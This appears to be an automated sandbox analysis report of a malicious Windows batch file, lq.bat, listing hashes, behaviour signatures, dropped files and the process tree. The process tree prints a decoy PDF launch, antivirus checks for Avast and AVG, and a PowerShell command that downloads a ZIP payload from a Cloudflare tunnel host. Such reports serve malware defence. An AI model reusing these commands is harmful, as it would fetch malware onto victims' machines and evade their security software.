Overview

overview

10

Static

static

1

lq.bat

windows7-x64

8

lq.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2024 13:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lq.bat

  • Size

    39KB

  • MD5

    c052ebca60e2ce218b10804cb0cbc835

  • SHA1

    cb24648a8bf6adb4807798d5cc6551bf1a9f148f

  • SHA256

    bf0d1aa2019f057e23d62c1f8b69f63005a313057ff79592d2cdc28981c9d257

  • SHA512

    e535443cb726ef0d52175cf7164aab93beddfa00c388793b199d64e5ac13cd8a8eb6e740c278b7845829fbdd452e5c8d65edc2e163149f080f7d4f10a96b44ab

  • SSDEEP

    768:4yA400UEtvrU5cl7/2Vu2OHpi29NO150+5Rxbh:4yv+

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\lq.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.gtai.de/resource/blob/64100/e57f02360902a7b14996ebbc78579a75/20241010_IO_Automotive_WEB.pdf
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2924 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2768
    • C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq AvastUI.exe"
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:2192
    • C:\Windows\system32\find.exe
      find /i "AvastUI.exe"
      2⤵
        PID:2316
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "IMAGENAME eq avgui.exe"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2816
      • C:\Windows\system32\find.exe
        find /i "avgui.exe"
        2⤵
          PID:2908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://robertson-glad-clip-illustrations.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2780

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        9c02be2dc2f312d3cef32cd571701f16

        SHA1

        bbb0094c746a3ab6a3b6019d6bdf8d3f5153de6c

        SHA256

        7a12b4835ea0a174c2b2aa6e38faccda7594414770467bcaca880af5fc410bb7

        SHA512

        68d186406365787b96f03903020820143094576b7acdf3262f1727eb142a49f5c6eb0d16990b71ca3c9a020cfd4cbcce5c056ea9140790667c287d6f4b9f0d31

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        503017ec4822bef8a7fbff01417fb93b

        SHA1

        73dcd7790ff94ee8ab2266588f15ed8a58545602

        SHA256

        8cf5bf89ae143b4d4ac722eaff4ae52903ec1b2e16d86fc09d504e3c162c8216

        SHA512

        b939af36a3fa8519b6c180f3f15f5662573e97891407ccec7202fb90d8e91776fc6bdd572c5281081a1f47499255cab0b7eaefbe9ce2d77c03af9e53933b3521

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        2cd407ad66d8cbe01cba54b89d1fa6cc

        SHA1

        b50a94938acfe0c1b409bfce3c4c04cea4637409

        SHA256

        cb4139b4fc2a51c78fc5c769d43eee69ebef768123358fb66b6f088570bc2e24

        SHA512

        faf31d31d573ecb7d71b0f10715487be884e1bdb635817189e726bd2228133757079ec8c4665208562950c15b2cfcca287a9510b3210daba3c397bc1c358fa00

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        643eca9bc255ea683c3e01ae3bb64b85

        SHA1

        b046fea421c72b708448a7c4c9529b25168a893c

        SHA256

        80d3d581fd40e86181e5e6500c9caf6187d18ab18308d011e58756c1e110573d

        SHA512

        087149f4a8e5f52b1102db52353a173548c481c86e24c95be566b7be26b2565a0dac74627d6df28f30521c38b84c062cb5325c586e9c58ac95873c3a4bc550c7

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        707e16c8e2ce62fc2c741fe13257310a

        SHA1

        563f8ddd01171c49a22e032075228a833499c01e

        SHA256

        7fbd9a574b2a113cb42ceecb35f62f5da023c4b2202a6d93cad1899b4dbe1150

        SHA512

        e407f3abe6d0084673158c1ee00155bfa389439105740512d13b6a757daba94dcd4d04281c1358104280ff5a18432552f0d4b70ca374d31e9ac3aae0b940bef6

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        81b243423eaa3cc2c1e66d9d173b3b39

        SHA1

        6568c4f019f173f52ff62c12e19dde82084cc576

        SHA256

        3d4bcba7fee5f10708c1a1aebc71b39806380d91cf00ee4921d057ce4972f82f

        SHA512

        a236751561d47ad0c2421cff0dcfeca1ddc18a35e7799d073d42b49128553402f357330b71945f32ac6abf780f00289c8dd13d364e28fb805ba942050ccc8e4e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        2f17c3c4dc6ae36fa5f588c436b12b76

        SHA1

        24bfadd4ea74f7c2e95dbb5fd62f8fdf25d530ed

        SHA256

        848ad49fade0ea13f57fba62958c712283de236850d8870d222eafde2ef2c09b

        SHA512

        9fe475d1b23c742083f5990d199492d2de09e0a61b13eae41574dd373e2027da202d67990de3df1f2ddd991ab21c55ac8d060a9052101dfb96b1f1a8897a8097

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        284f867d1d93b438cfbb55380b1f8f1b

        SHA1

        2df7e73636413b0eef6820e2b41a02b45ccebab9

        SHA256

        2d3bcc52967836087fc466e8b92e822e3c5d1c6cfc964c69b2e98d4c8ee19a2a

        SHA512

        f3a589642f8dfb817b0fc497471ef21ea5ea8dd0cf13350ef73e71c531859810558e4bffef905680266c80b28eb498a13f618dfcefda7886b33ff0e16ac8fbcf

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        49bb63babdedf11f6144a95450cc566f

        SHA1

        dfcdcf2525393f5dfacd3b5b37adc4f4cccb2b0f

        SHA256

        fec0d8ae4696b9a7f25b10150d3a46810dd1ca944114e6f35f143a290b6d87e7

        SHA512

        86ad2325c6736588a13d221488c2d55b84178a7414f952f52a487b630d20dd08b16a9ef334b1f4c22d9c36551123f6aa3b90f62f989da6bdc6c0673324e91e87

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        55e43dacbacc148db244b767229f7f65

        SHA1

        7d09459b02789570f132a92fea253d1a1f1fb40e

        SHA256

        c1bd7bd8177dc5847903abe978a2147f99c9875e619d32d0455c56d3c5f27fe5

        SHA512

        a7746d78ce0e54f68dbb446ceb037774a74be37e23344bd3be1625bd0221d37df93b8e408d27b9d1dc0d28269ec1789a0aae3f5da04a51233380e4f1164300ae

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        8e8fbe9d6a918039da80dd9854cf2cd0

        SHA1

        301ece5338cfe516e0bbe54f4602ca92fc4b1a43

        SHA256

        8642a4b1d1be957cf67cd38d39059d377a367649c1185ef2c49a6144a06f0d8d

        SHA512

        9c7bd5cc94fef755dfe0029fb854b64a2b6f68f35bd5fb9f7a3697d1ea2e27434ef6fb71300e9de029fb7dd7394971dc18555731ec4bd72793feccffe15b9038

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        23824ec36a139c9b5601e39dcb4d24ff

        SHA1

        4658a7d000d8ff7f5aa9a47530e9f8f17157d9b6

        SHA256

        ab451006e8fcb7d31778caca6b5e22376dba52ad78ce800c05c073c507a7d5dd

        SHA512

        80450573860caf364af6ba05f87f6c3f4febbd7b6094da5045b76bb51381faf6059435483159ea8e3fbaec5da213a32522ab92e322cb05bffc2c5f40a8fb881a

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        0bfb8c593001defe2583f96a64f80eb0

        SHA1

        006d38b97cdc26fb76e219b731b5d9543c5e6d81

        SHA256

        eba62f6ba279aafc1b1f2abe3e859e64991dbf487e2e90d36631563759f630c0

        SHA512

        4a277f65de5c0bc035a80555af2ecab678dd16d572f0a7edc2eecf72cbdbec2f3ffaf6e2cff4c1aadec5001607a9cc654b56746a93aa4575dcae780a78e4b91a

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        d9e29d662b55f7db96f8fe74ccb3f699

        SHA1

        d881f0021ee11802d358c7714f841c727acf32d7

        SHA256

        9f6883b657d34578968672348847c8dd653b1afdf6ddd0ac27339440662d9817

        SHA512

        4fe49a28cc7a475d165161c2e40a6a49160966ff86cd44fbefd8f3e843c1e5b16bf54e6e75b909aa4be6e034d7b21626e439033111283f489cb3d01037717501

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        546264eb1c8f3892871b125cf3c66d18

        SHA1

        65a6295230408d0846d5e413f3051442f889a2cd

        SHA256

        3a5d8178daffdd9dec2b65b4de1043cae0d69239fb4ac9940394b9d2a60df086

        SHA512

        159d89cec417d18ad32118773d16b3fa1da082151c7eb411c97a565152196becaedcfcb82a6fa7f2311f0f8908d50ecd1d725bc128894544c1971ce29c0ee50c

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        672f30f4a9078fc5cc3f0d26f0501f05

        SHA1

        72e6c6b38756298578c65fb48b12b7324be2ebf3

        SHA256

        97aa01385898c4a93a4855c76c6031e77ac062977263ec5d6f3a2b536f99e158

        SHA512

        c3e96a4306e8735c075e94c3b6163714fa738b3fa31ae411bcc267fc34633602145312c6b4bbb3668bb5daac9a4cf9bd9c4a7bc25b5d839590a98ecf9276ee52

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        19be9704fb85296429d8791da252ca1d

        SHA1

        849550bb7b6e15c22bf864ec704ef3e8ce295cf0

        SHA256

        96a0e5906675d5b8dfcc3147d99fc27ed661b211bfd46e3efc677adcb8be3766

        SHA512

        491d8044adda8bafc7703ff223dfb9e4cbce4a0e6dc086f3b170a4b5ab2e5abb813d36bf0877b8e749224a237924f2c5de68e11f86ea28f7d154939564b1cb4a

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        529e6b6a0fcf02a5b1f3fc12e616114c

        SHA1

        bfb3d93bd8aed8b937e4da25d07c7a64ccee08a9

        SHA256

        963ab2fb237cfc6a689554b830453e3d693fa8f6a316ec754872ba8bde0646b0

        SHA512

        4a83ba6931b363eb59ff042496a175c162b02b4a86b2d50e57a54dc731e5f7bd75d36b7f90b90efd3fb37513ac4e193e75254ca8175b3b8e06246ca526dab839

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\CabAB30.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\TarABA1.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        Download Submit

      • memory/2780-27-0x000000001B770000-0x000000001BA52000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2780-28-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

        Filesize

        32KB

        Download